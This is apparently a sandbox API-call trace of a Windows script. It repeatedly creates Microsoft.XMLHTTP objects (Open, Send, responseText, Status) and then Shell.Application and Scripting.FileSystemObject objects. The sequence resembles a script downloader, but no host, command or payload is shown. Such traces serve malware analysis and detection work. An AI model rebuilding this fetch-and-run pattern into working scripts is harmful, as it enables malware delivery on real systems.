	[0300.340] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0300.340] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0300.340] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c40) returned 0x0
	[0300.340] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0300.340] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0300.341] ??2@YAPEAX_K@Z () returned 0x62f330
	[0300.341] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0300.341] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0300.341] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0300.341] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c40) returned 0x0
	[0300.341] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c40) returned 0x3
	[0300.341] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0300.341] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0300.341] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0300.341] longjmp () 
	[0300.341] longjmp () 
	[0300.341] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0300.341] SysStringLen (param_1=0x0) returned 0x0
	[0300.341] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0300.341] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0300.342] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0300.342] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0300.342] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0300.342] ??2@YAPEAX_K@Z () returned 0x62f310
	[0300.342] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f310) 
	[0300.342] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0300.342] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0300.342] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0300.342] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0300.342] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0300.342] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0300.342] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0300.342] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0300.342] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0300.342] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0302.741] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0302.741] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0302.741] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0302.741] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0302.742] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0302.742] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0302.742] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0302.742] SysStringLen (param_1=0x0) returned 0x0
	[0302.742] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0302.742] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0302.742] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0302.742] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0302.742] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0302.742] ??2@YAPEAX_K@Z () returned 0x62f350
	[0302.742] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0302.742] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0302.742] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0302.742] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0302.742] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0302.743] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0302.743] SysStringLen (param_1=0x0) returned 0x0
	[0302.743] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0302.746] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0302.746] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0302.746] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0302.746] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0302.746] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0302.746] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0303.878] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0303.879] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0303.879] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0303.880] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0303.880] SysStringLen (param_1=0x0) returned 0x0
	[0303.880] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0303.880] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0303.880] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0303.880] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0303.880] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0303.880] ??2@YAPEAX_K@Z () returned 0x62f310
	[0303.880] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0303.880] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0303.881] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0303.881] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0303.881] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0303.881] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0303.881] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0303.883] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0303.883] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0303.883] SysStringLen (param_1=0x0) returned 0x0
	[0303.883] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0303.883] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0303.884] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0303.884] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0303.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0303.884] ??2@YAPEAX_K@Z () returned 0x62f330
	[0303.884] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f330) 
	[0303.884] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0303.884] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0303.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0303.884] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0303.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0303.884] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0303.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0303.884] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0303.884] SysStringLen (param_1=0x0) returned 0x0
